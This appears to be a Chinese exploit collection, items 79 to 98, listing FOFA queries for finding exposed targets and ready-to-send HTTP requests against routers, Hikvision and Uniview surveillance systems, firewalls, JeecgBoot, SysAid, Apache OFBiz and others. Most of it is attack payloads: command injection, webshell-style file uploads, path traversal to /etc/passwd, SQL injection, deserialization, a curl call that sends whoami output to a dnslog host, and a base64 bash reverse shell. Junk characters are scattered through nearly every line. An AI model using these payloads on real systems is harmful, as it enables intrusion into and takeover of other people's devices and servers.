------YsOxWxSvj1KyZow1PTsh98fdu6l--* y0 s, U% W3 T) _' U9 g
" {: I0 C+ ]* d2 T* Q) |+ L+ E- T+ F! ~! K
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1% L6 x! m# P3 b7 z. F) Y; }6 Q
Host: x.x.x.x& ?! B2 [! T: s7 A! c; S
0 ?2 W$ ?0 ~" |! c; _* n4 z
; r; K6 z8 C& J79. BYTEVALUE 百为流控路由器远程命令执行& D7 @2 \# l4 d: o1 a& s
FOFA:BYTEVALUE 智能流控路由器, K7 C. `3 y }* v
GET /goform/webRead/open/?path=|id HTTP/1.1
3 r, g9 o6 |' z+ g' \$ y+ WHost:IP
9 L5 u* [4 U6 F0 Q0 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
/ t: C1 `6 {# M6 A8 s; ` @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 B" ^# T* `- _" m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; o9 ]' v7 L6 F0 R' |& U, B. E# ?Accept-Encoding: gzip, deflate
- y. @! E' s# y0 T) AConnection: close
5 y/ M/ V: d, E9 v G) JUpgrade-Insecure-Requests: 1 q9 t8 k0 A$ ~5 [! W
4 G) Q: B2 |( v! g( ?, {
( D+ L* e- B+ |3 U6 N) F80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传% g# i5 G* C+ {% n% s
FOFA:app="速达软件-公司产品"
5 N! ?. b; h9 l& HPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.13 X9 n) g8 A7 j/ b! {
Host: x.x.x.x% `* R d; h J4 Q* D2 |$ I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" }5 P% H( {* t+ e7 d
Content-Length: 27- y5 h5 Y W, ]' `: X$ G" N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.86 I, j8 O* t; L* V9 v
Accept-Encoding: gzip, deflate
+ ^0 ?1 j. v6 x* q, h3 nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: @2 ~, S9 M& o' r( j* Q7 r
Connection: close8 c( g- f9 `, X0 T% _/ X
Content-Type: application/octet-stream% W5 n2 c3 Y$ h3 }2 T' k; t
Upgrade-Insecure-Requests: 1
6 b5 E* c, E/ P6 r( a
: Q+ P1 E4 u. z* U( Z/ p<% out.print("oessqeonylzaf");%>
6 W3 F: P- \& c$ j; O2 D, ]* W& e* S8 e7 A
" i* V5 T0 ^. l0 c( ~# B
GET /xykqmfxpoas.jsp HTTP/1.1
, d! v8 @& W% a7 f! THost: x.x.x.x, L( ~3 m' ?# ?0 w7 i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 b" \- o" I: V' k4 {
Connection: close& K+ P$ {+ P7 f" E6 s
Accept-Encoding: gzip- X: o4 D' p7 w7 m+ a' q
9 Y% Q1 B& G" O5 K6 G. X9 Z; k' h: c( }; e6 h8 ]! y- m' f
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
: s0 K; k; w6 B/ T# BFOFA:app="uniview-视频监控"" x Z0 U& v) H2 ^. x1 l
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1" M# h- z- T+ F7 G# X8 w) u& L
Host: x.x.x.x: e, q8 ~, k4 d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' {7 H- U) o/ v& {/ f8 a
Connection: close$ ^7 ?6 i8 `, S
Accept-Encoding: gzip
- J/ n; e" M. } y3 _- l3 Y3 J
8 M, ? H3 | u# G0 \6 p) H
N; C% W$ p' }( Y w# [7 w- _# e82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行2 e! ]% `% \$ U) |
FOFA:app="思福迪-LOGBASE"6 \/ P9 c' N$ f9 `6 g1 e, K
POST /bhost/test_qrcode_b HTTP/1.1, v% [5 \: i/ ?2 W: x G# q: z
Host: BaseURL
% ~6 u; q! ~# R' Y" m1 l3 m! {5 kUser-Agent: Go-http-client/1.1
* h- Y5 w _+ R( J: d- UContent-Length: 23" T" U" D7 [$ Q# n1 A- i3 s
Accept-Encoding: gzip0 j$ t9 f4 {1 O/ `
Connection: close
) i# T& A$ N* N2 tContent-Type: application/x-www-form-urlencoded
7 t( `' j b; _; T4 G; tReferer: BaseURL# w8 f8 B3 m2 p
9 u1 Z: R9 q( x4 n. M
z1=1&z2="|id;"&z3=bhost
2 @* R, d2 E3 z
& V7 |" }8 j2 o2 T; S4 t( x- b: D
83. JeecgBoot testConnection 远程命令执行
: n Y* c. w$ ?' F- h# XFOFA:title=="JeecgBoot 企业级低代码平台"
) d9 [: G3 d e7 o/ m5 ^0 f1 K+ U+ f0 Z+ T* W# Z
2 l0 W' K' l) p( J) mPOST /jmreport/testConnection HTTP/1.1
6 {: B. F/ _+ q5 ]! CHost: x.x.x.x8 _3 P* {4 I3 A! w* L
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. g+ b$ n! `( [5 F1 s! V( `
Connection: close
0 b& X- o' Q3 NContent-Length: 88814 Y& X; Y$ A! R. Z) W) f. G& i
Accept-Encoding: gzip
4 Z/ P) |* W }* x: N0 p3 MCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"( k5 S: L' Y* [' G* x' s
Content-Type: application/json N, l) B9 E9 W$ T: |; h
4 a- {8 U; _6 s; w6 bPAYLOAD. M& Z4 `4 {5 ]1 y$ c7 [! o0 y
: b, c8 }5 L; s* Q* t84. Jeecg-Boot JimuReport queryFieldBySql 模板注入; g" N! x% W! `6 y9 `, r- p y
FOFA:title=="JeecgBoot 企业级低代码平台"$ f. J4 Q- \( ]: ^& A; Y _
8 N. Y3 x* y) i( m/ S: \7 J( O/ y1 T; q
) Y Z: ~. ^) _( f" ?POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
s2 H' S2 t7 R, fHost: 192.168.40.130:8080
" i. J0 R9 ?& F$ \User-Agent: curl/7.88.1
( c. w* u# Q* O4 h% `% Q7 dContent-Length: 156
% ~8 ^2 ?# f# Q; h' N: d( mAccept: */*
2 q% c; m+ \, a! V' |( J0 UConnection: close
( C& c0 U# B) V. hContent-Type: application/json
( _1 h7 \/ T; c- e( Z% mAccept-Encoding: gzip# G0 V* u- c, {8 |: ?7 r
$ Y9 ]) ?# F5 v. Z{
. O1 M2 k3 S/ n' K8 }1 T "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
0 o$ Q+ {* j( _8 k1 [ "type": "0") U# `; ~" O) i: k
}" z* }; ~/ d+ Q2 D& L& I
* E0 w2 }: @, A7 _, Q3 e6 S
: Y1 i+ g1 y- ~. g; _ O4 u7 ~85. SysAid On-premise< 23.3.36远程代码执行
5 o" z: {5 X0 I8 d% _CVE-2023-47246$ F% k1 f0 T, C
FOFA:body="sysaid-logo-dark-green.png"
$ H$ z' ] }- D K7 y. ZEXP数据包如下,注入哥斯拉马" d4 K" h, \+ k5 j( t4 G
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
. N7 P) @/ v* m" v1 @& N! R6 G/ nHost: x.x.x.x0 z4 f d8 a1 Z; T9 V6 T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& M6 K3 @8 _. E" RContent-Type: application/octet-stream
5 B+ ~3 ~. Y; |5 z. e& {% RAccept-Encoding: gzip
: ^$ u0 m4 t/ y- o' U" k
9 B: m9 ]& q; T0 y9 }% @PAYLOAD
+ [. P2 l( G% s6 V5 ]$ ]! O
( G9 B1 R8 z6 P+ |3 F7 h回显URL:http://x.x.x.x/userfiles/index.jsp9 _) J& K0 m9 }* r$ s) d9 j
/ I- Q1 m) g) l8 {6 d86. 日本tosei自助洗衣机RCE
7 x3 z5 W t: ^. x' `) ?( yFOFA:body="tosei_login_check.php"
0 L- L$ y2 u, {# w0 XPOST /cgi-bin/network_test.php HTTP/1.1; u" g% r6 g' Z/ ]# H
Host: x.x.x.x
8 W7 H$ ~$ ~; [% f2 o$ A0 i* H, DUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
1 R+ S2 z* K0 }$ P; m% U4 L$ iConnection: close
7 E* X- u" T1 |" zContent-Length: 44" C( _7 F# t& [; d" O
Accept: */*
! L( v( V" `4 TAccept-Encoding: gzip; C/ b9 c" c& Y* B- a# I
Accept-Language: en
" ~- G' p/ m$ k9 X1 D- y' k# O/ jContent-Type: application/x-www-form-urlencoded8 y9 n" J7 ` \( q- I1 }
/ a, \, l5 [2 T! e
host=%0acat${IFS}/etc/passwd%0a&command=ping
. P6 y5 X' G5 d1 O$ z/ f+ H0 E- ?" n$ i6 q
; |0 k3 v+ C) \3 ?2 x% G87. 安恒明御安全网关aaa_local_web_preview文件上传 M' T$ J( M: w- j+ {3 j$ e/ P+ w
FOFA:title="明御安全网关"
6 h/ X2 d% y8 }6 LPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1' c) C( j0 T+ p4 R" H1 C" I+ C
Host: X.X.X.X
8 Q2 O+ q8 \4 S& v2 JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 w, s; [5 F( J! X2 q5 K4 |Connection: close m! ^/ ^1 k+ K% {7 d, W
Content-Length: 198
* \7 b8 y: o* b4 g- JAccept-Encoding: gzip
2 e. B# \! j+ \% Q% g( ], tContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd! {) h, p) z0 x
) m. N! d p0 q$ n$ `) r; a0 c+ G
--qqobiandqgawlxodfiisporjwravxtvd
' t: @' x2 l1 WContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"1 ~; V2 z( {; N, d4 y) k; e
Content-Type: text/plain
$ L" j' [% E+ Q* b; c3 t9 D9 Y3 a
2ZqGNnsjzzU2GBBPyd8AIA7QlDq% n" ^* P2 L5 ]
--qqobiandqgawlxodfiisporjwravxtvd--
7 i1 x2 j6 i& N
$ |9 r: D& @5 J3 }7 Y8 q# S8 ^8 z& l
/jfhatuwe.php( {7 h( R0 X% C/ Q' O+ e
$ e ^& u8 t+ D+ w# `) R, A9 P& G
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
2 z! a5 c6 y; o( S: R5 D* dFOFA:title="明御安全网关"
" r7 x$ d: x; ^9 RGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1: g+ P6 U7 w5 C8 h' V
Host: x.x.x.xx.x.x.x4 C8 F- N; P- o- d3 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ d. f2 H% C4 A8 m# q' ]4 qAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) t6 L& x" h. \! {7 P! K3 i! x1 I
Accept-Encoding: gzip, deflate( e( ?$ q- @! `/ h% [9 \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- _- y' A: P) Y/ y/ I( `* YConnection: close) J: w! m& ? j
' @8 t' z( I9 s
$ L \8 b0 S( @0 j, [4 c4 S
/astdfkhl.php* c9 B1 l9 R$ k* p
2 t& v$ I1 J, W. R" _+ o
89. 致远互联FE协作办公平台editflow_manager存在sql注入
. m0 H3 d5 d9 n! J8 @FOFA:title="FE协作办公平台" || body="li_plugins_download"5 ^ T( x- d$ _2 ^4 Q
POST /sysform/003/editflow_manager.js%70 HTTP/1.12 f" V, ~9 a7 i0 H' {
Host: x.x.x.x
* [+ A" }" y$ v" pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 U5 X! o( b# S
Connection: close1 L4 X2 A( e/ [- ]
Content-Length: 41- n& q0 d. n. [3 C0 |
Content-Type: application/x-www-form-urlencoded% L8 U5 i8 u, U2 _4 \% [# h
Accept-Encoding: gzip
7 O- x& _' O4 i2 c0 K5 r0 u. C: l: C- h
option=2&GUID=-1'+union+select+111*222--+
/ F% [2 ? G: X+ P& o# ~( k! y( K8 f0 |, s7 n, G
2 _' C6 \8 Z/ @
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
3 y$ _0 G. [. Y7 X1 |) fFOFA:icon_hash="-1830859634"
3 M+ h$ z4 _0 Y6 ~ P5 U9 cPOST /php/ping.php HTTP/1.1& ]1 R7 n E; h' M |! E3 R
Host: x.x.x.x
; y; t# g. f) |5 ]- KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
/ T8 Q- g5 k9 j: rContent-Length: 51
+ Z& p7 s. z: q, W- OAccept: application/json, text/javascript, */*; q=0.01( G+ m! X! J$ S- {4 K/ E
Accept-Encoding: gzip, deflate
0 n3 ]- c E! |4 v& H+ YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; G) _, `# k& Y# N3 Y/ W$ DConnection: close
0 A, U" ?) M! v+ vContent-Type: application/x-www-form-urlencoded
E% C, C& Z) PX-Requested-With: XMLHttpRequest4 @$ G- K1 }8 k' q
8 b4 A; s+ D4 t6 D* C# d5 Sjsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
p) v1 _4 B- L- X E) o3 `% e W% s* B* h, \% H
7 L- N" z9 [& n1 Q0 e91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
+ N" E* l& W2 JFOFA:title="综合安防管理平台"
8 a1 W6 M4 ]5 `/ TGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
$ B7 G! g8 P( k# S |! FHost: your-ip
% d( i* X- K0 b' P! L+ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36; i6 J) y" B$ X6 X3 b
Accept-Encoding: gzip, deflate
" f) N) D) ]- W; C8 m' H3 e+ I4 jAccept: */*/ G+ s. r+ V2 S6 l, S _# S
Connection: keep-alive
. L& [- t+ w" ^2 L% A1 x8 h
: B& R4 c* d- V: o3 [0 `
& H0 V7 D- [1 J- t6 z
7 G4 J2 \7 J9 m5 D; H92. 海康威视运行管理中心session命令执行7 Z, |. d: T7 l
Fastjson命令执行
! z' |/ k1 J4 k0 j, K5 p2 Hhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
# M, ~) ]( P8 u l( K! kPOST /center/api/session HTTP/1.1
& N; H: O0 Y5 ~4 }; kHost:
- Y! v* }: E1 A" t8 N% v- ~Accept: application/json, text/plain, */*
3 b9 \6 B! h3 g# Y( z! ZAccept-Encoding: gzip, deflate
- ~1 s, b; R. O- VX-Requested-With: XMLHttpRequest) k5 R$ s* \ I. j5 j
Content-Type: application/json;charset=UTF-8
0 _) B. ]- x# }7 n1 x f; ^X-Language-Type: zh_CN
4 ]9 V+ U, D( Z2 a% P; ~' GTestcmd: echo test" C& C$ i& ]* z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.364 l" ^0 y$ T0 m. }7 G
Accept-Language: zh-CN,zh;q=0.9 _1 K7 x5 d$ F& ]
Content-Length: 5778& s X6 O- S( q. p. q4 j! f' H
( Z) [) O" _! y
PAYLOAD
8 P" b" A" [% ?1 q, l5 x6 f8 ^9 s& M7 G/ r2 p1 {3 j
- w9 O. j- p7 a( J& o' w
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传3 C% z. X+ R' \
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="# `' J" w. j% Q3 d
POST /?g=app_av_import_save HTTP/1.1
4 P, m# r; P2 P" _Host: x.x.x.x
6 `1 q* |! |/ p. s' g7 Q' h7 FContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx1 p' X5 L" g# t' O! R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 m: C) M) l# X# F2 O" q- ~7 m
5 w! q# \2 s6 m Q! m1 Q0 w* s
------WebKitFormBoundarykcbkgdfx
% \1 h7 B$ l1 I: R' o9 \% CContent-Disposition: form-data; name="MAX_FILE_SIZE"- Z! m( m2 T* u1 c% G
8 a% @- F0 c0 P, i. w& Y, Z: H# W8 V9 i100000002 G: _" C1 Z' n- e# N
------WebKitFormBoundarykcbkgdfx
( c3 K) {/ m- p6 jContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt") M! e: j c: F
Content-Type: text/plain) }; o" j, q X9 Z! h9 R
6 \! E: u% L/ f2 O- awagletqrkwrddkthtulxsqrphulnknxa
" V5 F% ~, J/ H, z9 _- l5 w------WebKitFormBoundarykcbkgdfx& P9 t1 V% @' |$ W7 m/ {
Content-Disposition: form-data; name="submit_post"
5 M! z$ f! `2 u1 L. H& _/ R3 X; Z+ }( T% v; a7 ]
obj_app_upfile
9 N" m* ?' R. i N' L; }------WebKitFormBoundarykcbkgdfx1 x3 w4 I; k; O$ }; T4 X
Content-Disposition: form-data; name="__hash__"% y. k) A: O) a
+ a |5 Q& O- W0 @% u0b9d6b1ab7479ab69d9f71b05e0e9445
, k1 V/ ^5 f, s- L- [------WebKitFormBoundarykcbkgdfx--
$ _% \' o }" i6 F$ Z3 g) x! s% w/ u2 v
& E$ _4 ]; i5 _, S" b# T. B7 ]
GET /attachements/xlskxknxa.txt HTTP/1.1
' f1 @: B. p, r0 eHost: xx.xx.xx.xx" u) P) @) u* {+ Y: N" P+ s1 `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
! O' o* C+ Y, J# v8 i4 K6 {0 v6 C6 k9 N ]8 m& @: [
" u) v# }: `7 d% y
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
, B5 u4 f, I, y# TFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
0 j1 k8 y8 B7 K! [: k2 q/ LPOST /?g=obj_area_import_save HTTP/1.14 N9 `! N( l# p( P3 E" _
Host: x.x.x.x0 a$ k: J4 G; h b5 H+ @0 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt. g z$ i3 N- s# @3 r: J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. v4 J p% H M
# S8 z/ q c% \5 y& J
------WebKitFormBoundarybqvzqvmt
% [% y3 b0 i a; r- @Content-Disposition: form-data; name="MAX_FILE_SIZE"
7 L7 h1 H7 [/ c2 y5 I, N: w h
% v& Y! Q' H( u10000000& g) t6 Q6 t: O, w* ~
------WebKitFormBoundarybqvzqvmt
4 e7 F; [- {; F* l" uContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
$ a4 X% i- ]; Z- h: uContent-Type: text/plain& d4 \" s3 l6 C& _
6 b7 `9 H+ @+ P3 Y7 ?4 {pxplitttsrjnyoafavcajwkvhxindhmu
+ v- n2 O8 ~9 l) F. \------WebKitFormBoundarybqvzqvmt! U: q9 h4 `0 }5 X! u9 s) l0 O# \0 D
Content-Disposition: form-data; name="submit_post"
% [1 h% n! b3 A$ F$ d" w! g$ U7 C1 y' \1 `$ N' ]- G% r
obj_app_upfile
3 y. B y h& L: I, B! B* m) Z9 g+ X------WebKitFormBoundarybqvzqvmt
; e' r/ l8 W' BContent-Disposition: form-data; name="__hash__"1 E+ f( y. ?: r5 V# V2 s
: ]5 W- [9 J! \' z; ^4 {
0b9d6b1ab7479ab69d9f71b05e0e9445
* p, a0 s- ]- O------WebKitFormBoundarybqvzqvmt--8 t3 J g" I9 q9 P( p) n
2 m6 e7 W. u3 L, I- W! w) D
c! T/ F' {: O) s! T/ R
3 D: _9 H4 V) q0 H* q% [+ x
GET /attachements/xlskxknxa.txt HTTP/1.1
) L# E0 q3 x! v8 {0 }, v( N) O% Y" QHost: xx.xx.xx.xx/ c% S# i' Q0 n( z# O
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36# K7 q C6 X& ?) E) I& D, y P- t- i
2 v9 n/ M+ y1 Y9 x( Y& d
. t5 |2 N8 h" x: j+ e' {
9 @* s6 m3 s: Q3 C95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行. E, L& @6 o( i5 j; |
CVE-2023-49070
: r- Y; e' q* J2 `( wFOFA:app="Apache_OFBiz"5 ^4 x2 t9 f n- r* t& ]; f+ ~# s
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 B# D R0 r2 V1 e J1 x6 b" ]/ b: F
Host: x.x.x.x9 g0 H! A4 t; @9 w8 }/ B; M1 ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36$ v3 a) v7 ]* k0 H( ~1 S1 y
Connection: close' \% b% Q: \+ h5 s
Content-Length: 889
9 h/ ^" {1 z/ v0 X% DContent-Type: application/xml, l7 r; l7 }! b1 r; \% N( P3 x
Accept-Encoding: gzip
' V; G4 a5 ~6 y( D" j% F+ m" Y' Z& F( Q' V Y
<?xml version="1.0"?>; S+ v. u/ v- E4 c4 q* b" V N
<methodCall>8 e3 h) m! m, `7 p) d
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>& w5 Z* h! P5 T6 l/ t% o
<params>) t% r( j! E+ K1 g
<param>
6 j: y9 ?- S% G' [ <value>
) E' F/ s& K3 t4 S$ [ <struct>
) V; c8 e+ {/ G5 @) o$ \( i5 N <member>
' ^9 w/ T8 L* u; o* ^1 K, s <name>test</name>
. k! S2 \, E0 Y1 W% V7 \ <value>* U) t4 f* d) M+ g0 `
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
4 Q9 g) A( T& c! ~ d </value>, r0 H% x5 C# Y/ ^
</member>
7 A }9 C; a% C m0 L </struct>$ N5 ]0 z5 L7 K' N& i3 P
</value>. M7 B3 F0 @7 J* z( ~
</param>
+ [1 a" C+ y; i# H3 t1 k7 j </params>) Y3 ?, m5 W) c' Y8 t
</methodCall>
5 C8 c+ k/ F. P% V& r7 J/ D# k4 `2 a, ^' n
$ s0 z! i7 U% |/ R9 p, e! F) A用ysoserial生成payload
2 z* |$ T9 ?' ~java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"- g. i; C5 ~6 o( k, A! t9 S
: Y+ Z) w5 S' |
8 v( `9 I' A: t P- U" v( }$ Z
将生成的payload替换到上面的POC7 N; h. J- o. p% l: b: H; a/ n- |
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
: u, p1 D% T+ wHost: 192.168.40.130:8443$ q: t& ~- P# j$ ]/ m F' ^% s- M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.365 Y( n3 |2 k1 `: ~5 B. ?- p0 E
Connection: close
3 G: c8 h, w0 {" ~* KContent-Length: 889
6 h" R3 w! c K m9 V/ p7 A. X A" cContent-Type: application/xml
- B E! O4 J% l1 c4 _# K {Accept-Encoding: gzip f' Y4 ~1 P5 Q- X) _
. o5 Y3 X% A2 K0 u/ UPAYLOAD! g; ?# h% q* W& q7 V9 ]+ _
; z1 o" ^2 \; ], R; w! A6 J96. Apache OFBiz 18.12.11 groovy 远程代码执行+ c) d9 Y7 [/ m8 Q+ i4 G+ N
FOFA:app="Apache_OFBiz"
& L8 m: e: F, ] ^0 y9 C% KPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.19 Q6 B, u2 f: ~/ K8 x
Host: localhost:8443
9 z* {+ x2 S, r3 b# oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# ]: I' e% e3 Y4 n% r2 ]Accept: */*% u0 M1 M6 R2 ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* Z$ X4 `, X+ N9 G* d/ b
Content-Type: application/x-www-form-urlencoded
/ }* f ^' S3 a: G5 xContent-Length: 55* O: D9 {: f6 Z7 b, v! ]2 y' Z0 C
1 X& E0 Q+ s% T2 F; ]) S. egroovyProgram=throw+new+Exception('id'.execute().text);
?) B |3 p" f
. h6 L# `1 J# H! b
& R. A7 \. s5 f3 \+ D反弹shell
0 a+ a; f* i8 o. k2 `* o在kali上启动一个监听
% F# ~: O2 r& k5 d& s4 z8 Tnc -lvp 7777
6 J1 ?* }1 E$ U- }
- d6 c4 Z5 h; ?7 `* GPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" @7 N& Y2 X {4 l. u* M: i9 a
Host: 192.168.40.130:8443
/ G8 D( N4 `- J; yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 a' l, g" z* @2 E' o- [) s. s
Accept: */*
3 `2 T! p& B, G" ?- _1 f- ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" V4 Y; h6 g8 t& h7 `% s+ l1 [
Content-Type: application/x-www-form-urlencoded# \. G2 w: D0 f y
Content-Length: 71
' G# i$ v1 N* I$ d
" U% X. U* Z8 e# Q/ zgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
7 [1 ]# A, l$ U3 `8 T3 _5 W7 b/ `" K) C
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
* g6 O1 T* b3 Z3 x% ~" m( O6 L- aFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"8 Q, p, }$ @3 U" c' B X# |
GET /passport/login/ HTTP/1.1
3 ]1 s9 ~* F& ~* a4 O5 OHost: 192.168.40.130:8085
. w' Y8 r7 |% v: L( I9 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 U( x$ l5 T) O. zAccept-Encoding: gzip. f, R4 W8 Z: E, Z# K2 W
Connection: close
5 J9 V( U+ U$ w* l, WCookie: rememberMe=PAYLOAD
9 L4 j2 p! G/ l# X$ d+ A0 `X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"( ?3 V8 l6 e8 }: j( H9 f
; m" F& D! O, t/ ]$ i* Z
( ~# l& R o) _$ v+ D4 b98. SpiderFlow爬虫平台远程命令执行9 a I1 H) r6 ?; q9 u
CVE-2024-01954 T4 Q7 W9 Y; z; j
FOFA:app="SpiderFlow"- W! Y6 j( w. ?/ s& o
POST /function/save HTTP/1.14 z& v, I7 s" Y
Host: 192.168.40.130:80887 A7 w- r( p- F& d5 M: ]) o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ {& B: j1 E% a/ ~& S* c! ]" I
Connection: close3 g1 d7 J! s$ X5 ^
Content-Length: 121/ e) Z9 ?5 a3 v0 }0 J
Accept: */*
9 g# M, W0 [/ v1 U: p) X/ CAccept-Encoding: gzip, deflate
# j9 B+ M7 |! y* N; E; W- D+ RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ }# I& h9 P2 cContent-Type: application/x-www-form-urlencoded; charset=UTF-8' r1 [( A+ B: j( p
X-Requested-With: XMLHttpRequest
& [ o- t G2 ~1 t6 c( T% s! _# b1 G$ B4 C1 ]# l
